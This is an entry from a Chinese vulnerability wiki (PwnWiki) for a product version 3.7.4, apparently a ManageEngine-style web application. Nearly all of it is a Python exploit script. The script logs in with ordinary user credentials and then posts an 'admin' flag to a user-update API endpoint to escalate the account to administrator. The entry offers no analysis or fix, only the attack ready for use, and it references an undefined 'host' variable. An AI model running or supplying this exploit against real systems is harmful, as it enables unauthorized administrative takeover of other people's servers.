免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
影响版本
Version : 3.7.4
EXP
import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def privesc(): data = { 'uname':username, 'fullname':username, 'password':password, 'admin':1 } resp = sess.post(url + '/api/1/admin/users/update', data=data) if resp.ok: print('Escalated to administrator.') else: print('Unable to escalate to administrator.') return if __name__ == '__main__': login() privesc()
免费、自由、人人可编辑的漏洞库